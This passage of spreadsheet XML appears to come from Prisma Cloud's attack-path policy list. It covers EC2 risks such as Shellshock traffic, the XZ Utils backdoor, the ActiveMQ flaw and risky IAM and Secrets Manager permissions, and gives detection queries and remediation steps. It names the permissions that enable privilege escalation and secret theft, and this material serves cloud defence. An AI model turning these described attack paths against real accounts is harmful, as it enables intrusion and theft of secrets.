          <t>2024-01-19 05:21:11</t>
        </is>
      </c>
      <c r="AC1819" t="inlineStr"/>
      <c r="AD1819" t="b">
        <v>1</v>
      </c>
      <c r="AE1819" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1819" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG18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19" t="inlineStr">
        <is>
          <t>ea6adb45-a9c7-479c-a245-d9d0cc30596e</t>
        </is>
      </c>
      <c r="AI1819" t="inlineStr">
        <is>
          <t>3cacdb88-a29d-414c-a5d4-c9d57e5083b8</t>
        </is>
      </c>
      <c r="AJ1819" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1819" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1820">
      <c r="A1820" t="inlineStr"/>
      <c r="B1820" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1820" s="2" t="inlineStr"/>
      <c r="D1820" t="inlineStr"/>
      <c r="E1820" t="inlineStr"/>
      <c r="F1820" t="inlineStr"/>
      <c r="G1820" t="b">
        <v>1</v>
      </c>
      <c r="H18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20" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1820" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1820" t="inlineStr">
        <is>
          <t>Privilege escalation risk due to Shellshock payload detected on traffic targetting a vulnerable AWS EC2 instance with privilege escalation permissions</t>
        </is>
      </c>
      <c r="L1820" t="inlineStr">
        <is>
          <t>WEB_ATTACK,PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M1820" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1820" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1820" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1820" t="inlineStr">
        <is>
          <t>misconfig_and_event</t>
        </is>
      </c>
      <c r="Q1820" t="inlineStr"/>
      <c r="R1820" t="inlineStr"/>
      <c r="S1820" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1820" t="b">
        <v>0</v>
      </c>
      <c r="U1820" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1820" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1820" t="inlineStr">
        <is>
          <t>This policy identifies vulnerable AWS EC2 instance with Shellshock payload detected in the traffic and having permissions that could potentially lead to privilege escalation.
Shellshock vulnerability allows attackers to execute arbitrary code on a vulnerable system by exploiting how Bash processes environment variables. When combined with elevated EC2 instance permissions and Shellshock vulnerability payload in the traffic, attackers can escalate privileges, gain control over resources, and execute malicious actions within the environment.
This policy checks for the following permissions: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Immediate attention is required to review the EC2 traffic, add the WAAS rule to prevent this activity, remediate critical and high vulnerabilities, and remove unwanted permissions assigned to the EC2 instance.</t>
        </is>
      </c>
      <c r="X182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1820" t="inlineStr"/>
      <c r="Z1820" t="inlineStr">
        <is>
          <t>asset where asset.type IN ( 'aws-ec2-describe-instances' ) and finding.name contains all ('Shellshock payload detected in HTTP traffic','AWS EC2 instance with privilege escalation risk permissions') AND with : ( Vuln WHERE severity greater than or equal to high )</t>
        </is>
      </c>
      <c r="AA1820" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1820" t="inlineStr">
        <is>
          <t>2024-10-14 06:35:55</t>
        </is>
      </c>
      <c r="AC1820" t="inlineStr"/>
      <c r="AD1820" t="b">
        <v>1</v>
      </c>
      <c r="AE1820" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1820" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG18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20" t="inlineStr">
        <is>
          <t>a846fba5-2878-4b50-9fef-d8311eb337d6</t>
        </is>
      </c>
      <c r="AI1820" t="inlineStr">
        <is>
          <t>35b4f482-bc9a-4744-93d1-a65f65cd2f39</t>
        </is>
      </c>
      <c r="AJ1820" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1820" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1821">
      <c r="A1821" t="inlineStr"/>
      <c r="B1821" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1821" s="2" t="inlineStr"/>
      <c r="D1821" t="inlineStr"/>
      <c r="E1821" t="inlineStr"/>
      <c r="F1821" t="inlineStr"/>
      <c r="G1821" t="b">
        <v>1</v>
      </c>
      <c r="H18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21" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1821" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1821" t="inlineStr">
        <is>
          <t>Privilege escalation risk due to a publicly exposed unprivileged AWS EC2 instance with high/critical severity vulnerabilities assuming admin privileges</t>
        </is>
      </c>
      <c r="L1821" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION,INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M1821" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1821" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1821" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1821" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q1821" t="inlineStr"/>
      <c r="R1821" t="inlineStr"/>
      <c r="S1821" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1821" t="b">
        <v>0</v>
      </c>
      <c r="U1821" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1821" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1821" t="inlineStr">
        <is>
          <t>This policy identifies unprivileged AWS EC2 instances that are publicly exposed with high/critical severity vulnerabilities assuming admin privileges.
Publicly exposed EC2 instances with high/critical severity vulnerabilities could allow malicious actors to get initial access to the instance. AWS EC2 instances assuming admin privileges pose a high security risk due to the extensive permissions and control granted to the administrator. With admin privileges, an individual or entity could potentially make unauthorized changes to critical resources, access sensitive data, and compromise the security of the entire environment.
Immediate attention is required to grant only the least privileges required and remove unwanted role assignments / permissions assigned to the EC2 instance, remediate critical and high vulnerabilities, and restrict public exposure reported for the EC2 instances as soon as possible.</t>
        </is>
      </c>
      <c r="X1821" t="inlineStr">
        <is>
          <t>[INTERNET_EXPOSURE]
Restrict access to the AWS EC2 instance by configuring Security group rules
1. Sign in to the AWS Console
2. Navigate to the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
[PERMISSION]
In order to remove any administrative permissions and minimize trusted entities which can assume the role, use the following remediation steps:
1. Browse to the privileged role ("Destination") in the AWS Console
2. Select "Trust relationships"-&gt;"Edit trust policy"
3. Modify the role's trust relationship as per requirements
4.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21" t="inlineStr"/>
      <c r="Z1821" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('aws-ec2-describe-instances') and finding.name contains all ('AWS EC2 instance with network path from the internet (0.0.0.0/0)','Unprivileged Compute resource can assume a Service Account with admin privileges') AND with : (Vuln WHERE severity greater than or equal to high)</t>
        </is>
      </c>
      <c r="AA1821" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1821" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:27</t>
        </is>
      </c>
      <c r="AC1821" t="inlineStr"/>
      <c r="AD1821" t="b">
        <v>1</v>
      </c>
      <c r="AE1821" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1821" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG18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21" t="inlineStr">
        <is>
          <t>f483992b-c945-440d-a133-4d928618cfb3</t>
        </is>
      </c>
      <c r="AI1821" t="inlineStr">
        <is>
          <t>650b4d99-c395-47c3-be65-443ed122979a</t>
        </is>
      </c>
      <c r="AJ1821" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1821" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1822">
      <c r="A1822" t="inlineStr"/>
      <c r="B1822" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1822" s="2" t="inlineStr"/>
      <c r="D1822" t="inlineStr"/>
      <c r="E1822" t="inlineStr"/>
      <c r="F1822" t="inlineStr"/>
      <c r="G1822" t="b">
        <v>1</v>
      </c>
      <c r="H18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2" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1822" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1822" t="inlineStr">
        <is>
          <t>Remote code execution risk due to publicly exposed and vulnerable AWS EC2 instance (XZ Utils Backdoor, CVE-2024-3094)</t>
        </is>
      </c>
      <c r="L1822" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M1822" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1822" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1822" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1822" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q1822" t="inlineStr"/>
      <c r="R1822" t="inlineStr"/>
      <c r="S1822" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1822" t="b">
        <v>0</v>
      </c>
      <c r="U1822" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1822" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1822" t="inlineStr">
        <is>
          <t>This policy identifies AWS EC2 instances that are publicly exposed and have a known malicious backdoor (Linux XZ Vulnerability, CVE-2024-3094).
CVE-2024-3094 affects XZ Utils and potentially enables unauthorized access through SSH authentication bypass. With a maximum CVSS score of 10.0, it involves malicious code injected into versions 5.6.0 and 5.6.1 of XZ Utils. This backdoor manipulates the liblzma library, used for data compression, and allows an attacker to execute arbitrary code (RCE) on the host operating system, potentially leading to system compromise, data breaches, and escalated privileges to launch further attacks.
The fact that the AWS EC2 instance is publicly exposed makes it an easy target for attackers to compromise the affected system. Successful exploitation of the backdoor on the publicly exposed AWS EC2 instance would allow an attacker to gain full control of the host and further move laterally to compromise other resources.
Immediate attention is required to remediate the Linux (CVE-2024-3094) backdoor and the public exposure reported for the affected AWS EC2 instances as soon as possible.</t>
        </is>
      </c>
      <c r="X1822" t="inlineStr">
        <is>
          <t>[Internet Exposure]
Restrict Internet exposure of reported EC2 Instances based on your business requirement by modifying Security groups rules to the trusted IP address.
To modify Security Groups rules,
1. Sign in to AWS Console
2. Navigate to EC2 Dashboard
3. Identify the EC2 instances that you want to restrict access to Internet
4. Click on Security Group attached to the instance
5. Update inbound rules that allow Internet access (0.0.0.0/0) to the trusted IP address
   Refer to the following link for detailed steps to modify security group rules,
   https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/working-with-security-groups.html#updating-security-group-rules
NOTE: When modifying Security groups rules, make sure that you don't lock yourself out of the instances. Always have a rule that allows you to access them for management purposes.
[Vulnerability]
To patch or update vulnerable Software for Version 5.6.0 to 5.6.1
   Refer below given URL to obtain more details on the vulnerability and fix,
   https://nvd.nist.gov/vuln/detail/CVE-2024-3094</t>
        </is>
      </c>
      <c r="Y1822" t="inlineStr"/>
      <c r="Z1822" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('aws-ec2-describe-instances') and finding.name contains all ('AWS EC2 instance with network path from the internet (0.0.0.0/0)') AND with : (Vuln WHERE id IN ('CVE-2024-3094'))</t>
        </is>
      </c>
      <c r="AA1822" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1822" t="inlineStr">
        <is>
          <t>2024-04-26 08:13:58</t>
        </is>
      </c>
      <c r="AC1822" t="inlineStr"/>
      <c r="AD1822" t="b">
        <v>1</v>
      </c>
      <c r="AE1822" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1822" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG18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2" t="inlineStr">
        <is>
          <t>f0d41a9f-4ea2-4dd7-8a67-96e339dcf508</t>
        </is>
      </c>
      <c r="AI1822" t="inlineStr">
        <is>
          <t>d4efdaea-331b-4fd5-b720-6cac0ac8447b</t>
        </is>
      </c>
      <c r="AJ1822" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1822" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1823">
      <c r="A1823" t="inlineStr"/>
      <c r="B1823" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1823" s="2" t="inlineStr"/>
      <c r="D1823" t="inlineStr"/>
      <c r="E1823" t="inlineStr"/>
      <c r="F1823" t="inlineStr"/>
      <c r="G1823" t="b">
        <v>1</v>
      </c>
      <c r="H18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3" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1823" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1823" t="inlineStr">
        <is>
          <t>Unauthorized access risk due to publicly exposed admin ports on AWS EC2 instance with secrets Manager permissions</t>
        </is>
      </c>
      <c r="L1823" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION,INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M1823" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1823" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1823" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1823" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q1823" t="inlineStr"/>
      <c r="R1823" t="inlineStr"/>
      <c r="S1823" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1823" t="b">
        <v>0</v>
      </c>
      <c r="U1823" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1823" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1823" t="inlineStr">
        <is>
          <t>This policy identifies AWS EC2 instances which are publicly exposed with unrestricted access to admin ports (SSH / RDP) and have risky access and decrypt Secrets Manager Secrets permissions.
Risky permissions on publicly exposed EC2 instances with unrestricted access to admin ports (SSH / RDP) may allow an attacker to gain access to the EC2 instances with risky access and decrypt permissions could allow a malicious actor to retrieve sensitive secrets from Secrets Manager and unauthorized decryption of encrypted data through AWS Key Management Service (KMS).
This policy checks for the following risky access and decrypt Secrets Manager Secrets permissions:
'secretsmanager:GetSecretValue', 'kms:Decrypt'
Immediate attention is required to review risky access and decrypt Secrets Manager Secrets permissions. Restrict public exposure of admin ports reported for the EC2 instances as soon as possible.</t>
        </is>
      </c>
      <c r="X1823"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to admin ports (tcp/22, tcp/3389)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823" t="inlineStr"/>
      <c r="Z1823" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('aws-ec2-describe-instances') and finding.name contains all ('AWS EC2 instance with network path from the internet (0.0.0.0/0) on Admin ports','AWS IAM policy allows access and decrypt Secrets Manager Secrets permissions')</t>
        </is>
      </c>
      <c r="AA1823" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1823" t="inlineStr">
        <is>
          <t>2024-01-19 05:21:06</t>
        </is>
      </c>
      <c r="AC1823" t="inlineStr"/>
      <c r="AD1823" t="b">
        <v>1</v>
      </c>
      <c r="AE1823" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1823" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG18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3" t="inlineStr">
        <is>
          <t>8c6ff259-21a6-4686-a4fb-3238dfe5f8a5</t>
        </is>
      </c>
      <c r="AI1823" t="inlineStr">
        <is>
          <t>a6bc46f0-b947-4f63-9f62-d46a56f75b0d</t>
        </is>
      </c>
      <c r="AJ1823" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1823" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1824">
      <c r="A1824" t="inlineStr"/>
      <c r="B1824" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1824" s="2" t="inlineStr"/>
      <c r="D1824" t="inlineStr"/>
      <c r="E1824" t="inlineStr"/>
      <c r="F1824" t="inlineStr"/>
      <c r="G1824" t="b">
        <v>1</v>
      </c>
      <c r="H18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4" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1824" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1824" t="inlineStr">
        <is>
          <t>Remote code execution risk due to publicly exposed and vulnerable AWS EC2 instance (Apache ActiveMQ, CVE-2023-46604)</t>
        </is>
      </c>
      <c r="L1824" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M1824" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1824" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1824" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1824" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q1824" t="inlineStr"/>
      <c r="R1824" t="inlineStr"/>
      <c r="S1824" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1824" t="b">
        <v>0</v>
      </c>
      <c r="U1824" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1824" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1824" t="inlineStr">
        <is>
          <t>This policy identifies AWS EC2 instance that are publicly exposed and have known exploitable Remote code execution vulnerability (CVE-2023-46604).
Remote code execution vulnerability would allow an attacker to execute arbitrary code on the host operating system, potentially leading to system compromise, data breaches and escalate privileges to launch further attacks. The fact that the AWS EC2 instance is publicly exposed makes it an easy target for an attacker to compromise the affected system.
Successful exploitation of the Apache ActiveMQ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ActiveMQ (CVE-2023-46604) vulnerability and public exposure reported for the affected AWS EC2 instance as soon as possible.</t>
        </is>
      </c>
      <c r="X1824"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[VULNERABILITY]
1. Identify and access the reported resource affected by CVE-2023-46604
2. Perform thorough backups of software configurations and data before applying updates
3. Refer below given URL to obtain more details on the vulnerability and fix
   https://nvd.nist.gov/vuln/detail/CVE-2023-46604</t>
        </is>
      </c>
      <c r="Y1824" t="inlineStr"/>
      <c r="Z1824" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('aws-ec2-describe-instances') and finding.name contains all ('AWS EC2 instance with network path from the internet (0.0.0.0/0)') AND with : (Vuln WHERE id IN ('CVE-2023-46604'))</t>
        </is>
      </c>
      <c r="AA1824" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1824" t="inlineStr">
        <is>
          <t>2024-03-05 05:47:11</t>
        </is>
      </c>
      <c r="AC1824" t="inlineStr"/>
      <c r="AD1824" t="b">
        <v>1</v>
      </c>
      <c r="AE1824" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1824" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG18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4" t="inlineStr">
        <is>
          <t>acfc1b21-1a94-43e5-97ff-7aa091db242d</t>
        </is>
      </c>
      <c r="AI1824" t="inlineStr">
        <is>
          <t>47484514-d894-48fe-9921-077382e41025</t>
        </is>
      </c>
      <c r="AJ1824" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1824" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1825">
      <c r="A1825" t="inlineStr"/>
      <c r="B1825" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1825" s="2" t="inlineStr"/>
      <c r="D1825" t="inlineStr"/>
      <c r="E1825" t="inlineStr"/>
      <c r="F1825" t="inlineStr"/>
      <c r="G1825" t="b">
        <v>1</v>
      </c>
      <c r="H18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5" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1825" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1825" t="inlineStr">
        <is>
          <t>IAM based lateral movement risk due to a publicly exposed and vulnerable AWS EC2 instance with permissions to create new IAM identities (User, Group or Role)</t>
        </is>
      </c>
      <c r="L1825" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION,INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M1825" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1825" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1825" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1825" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q1825" t="inlineStr"/>
      <c r="R1825" t="inlineStr"/>
      <c r="S1825" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1825" t="b">
        <v>0</v>
      </c>
      <c r="U1825" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1825" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1825" t="inlineStr">
        <is>
          <t>This policy identifies AWS EC2 instances that are publicly exposed with critical or high vulnerabilities and risky permissions to create new IAM identities (User or Group or Role).
Publicly exposed vulnerable EC2 instances could allow malicious actors to remotely exploit the vulnerability to get initial access to the instance. The risky IAM permissions on the instance to create new IAM identities (User or Group or Role) further help the attackers to perform unauthorized actions or lateral movement.
This policy checks for risky combinations of the following IAM permissions:
'iam:CreateUser', 'iam:AttachUserPolicy', 'iam:CreateRole', 'iam:AttachRolePolicy', 'iam:CreateGroup', 'iam:AttachGroupPolicy'
Immediate attention is required to review the risky permissions and grant only the minimum privileges required. Remove unwanted permissions assigned to the EC2 instances. Remediate critical and high vulnerabilities and restrict public exposure reported for the instances as soon as possible.</t>
        </is>
      </c>
      <c r="X1825"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25" t="inlineStr"/>
      <c r="Z1825" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('aws-ec2-describe-instances') and finding.name = (('AWS EC2 instance with network path from the internet (0.0.0.0/0)') and ('AWS EC2 instance with the creation of a new Group with attached policy permission' or 'AWS EC2 instance with the creation of a new Role with attached policy permission' or 'AWS EC2 instance with the creation of a new User with attached policy permission')) AND with : (Vuln WHERE severity greater than or equal to high)</t>
        </is>
      </c>
      <c r="AA1825" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1825" t="inlineStr">
        <is>
          <t>2023-10-27 07:54:09</t>
        </is>
      </c>
      <c r="AC1825" t="inlineStr"/>
      <c r="AD1825" t="b">
        <v>1</v>
      </c>
      <c r="AE1825" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1825" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG18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5" t="inlineStr">
        <is>
          <t>ba179a68-1220-40cf-9708-b3a4b2f142a1</t>
        </is>
      </c>
      <c r="AI1825" t="inlineStr">
        <is>
          <t>c683f94f-df3b-4d42-b8f9-1f1c0794c843</t>
        </is>
      </c>
      <c r="AJ1825" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1825" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1826">
      <c r="A1826" t="inlineStr"/>
      <c r="B1826" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1826" s="2" t="inlineStr"/>
      <c r="D1826" t="inlineStr"/>
      <c r="E1826" t="inlineStr"/>
      <c r="F1826" t="inlineStr"/>
      <c r="G1826" t="b">
        <v>1</v>
      </c>
      <c r="H18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6" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1826" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1826" t="inlineStr">
        <is>
          <t>Privilege escalation risk due to a publicly exposed and vulnerable AWS EC2 instance with potentially hazardous AWS CodeStar IAM permissions</t>
        </is>
      </c>
      <c r="L1826" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION,INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M1826" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1826" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1826" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1826" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q1826" t="inlineStr"/>
      <c r="R1826" t="inlineStr"/>
      <c r="S1826" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1826" t="b">
        <v>0</v>
      </c>
      <c r="U1826" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1826" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1826" t="inlineStr">
        <is>
          <t>This policy identifies AWS EC2 instances that are publicly exposed with critical or high vulnerabilities and having risky CodeStar permissions that could potentially lead to privilege escalation.
Publicly exposed vulnerable EC2 instances could allow malicious actors to remotely exploit the vulnerability to get initial access to the instance. The risky privilege escalation CodeStar permissions on the instance further help the attackers to escalate their privilege and perform unauthorized actions in the cloud account.
This policy checks for the following risky permissions that could potentially lead to privilege escalation:
'codestar:CreateProject', 'codestar:AssociateTeamMember', 'iam:PassRole'.
Immediate attention is required to review risky permissions and grant only the least privileges required. Remove unwanted permissions assigned to the EC2 instances. Remediate critical and high vulnerabilities, and restrict public exposure reported for the instances as soon as possible.</t>
        </is>
      </c>
      <c r="X1826" t="inlineStr">
        <is>
          <t>[INTERNET_EXPOSURE]
Restrict access to the AWS EC2 instance by configuring Security group rules
1. Sign in to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CIDR range 0.0.0.0/0 do not exists
8. Click 'Save rules' to apply the changes
[PERMISSION]
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1826" t="inlineStr"/>
      <c r="Z1826" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('aws-ec2-describe-instances') and finding.name = (('AWS EC2 instance with network path from the internet (0.0.0.0/0)') and ('AWS IAM policy allows Privilege escalation via Codestar create project and associate team member permissions' or 'AWS IAM policy allows Privilege escalation via PassRole &amp; CodeStar project permissions')) AND with : (Vuln WHERE severity greater than or equal to high)</t>
        </is>
      </c>
      <c r="AA1826" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1826" t="inlineStr">
        <is>
          <t>2023-10-27 07:54:09</t>
        </is>
      </c>
      <c r="AC1826" t="inlineStr"/>
      <c r="AD1826" t="b">
        <v>1</v>
      </c>
      <c r="AE1826" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1826" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG18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6" t="inlineStr">
        <is>
          <t>d72b4d6a-2ee1-4bf3-908f-6ffb1cda3ff0</t>
        </is>
      </c>
      <c r="AI1826" t="inlineStr">
        <is>
          <t>12a16d4b-4300-4480-acf7-2ec1581420e4</t>
        </is>
      </c>
      <c r="AJ1826" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1826" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1827">
      <c r="A1827" t="inlineStr"/>
      <c r="B1827" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1827" s="2" t="inlineStr"/>
      <c r="D1827" t="inlineStr"/>
      <c r="E1827" t="inlineStr"/>
      <c r="F1827" t="inlineStr"/>
      <c r="G1827" t="b">
        <v>1</v>
      </c>
      <c r="H18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7" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1827" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1827" t="inlineStr">
        <is>
          <t>Authentication bypass (BAC &amp; Privilege Escalation) exploitation attempt on AWS EC2 instance with known exploitable vulnerability [Grafana Snapshot, CVE-2021-39226]</t>
        </is>
      </c>
      <c r="L1827" t="inlineStr">
        <is>
          <t>WEB_ATTACK</t>
        </is>
      </c>
      <c r="M1827" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1827" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1827" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
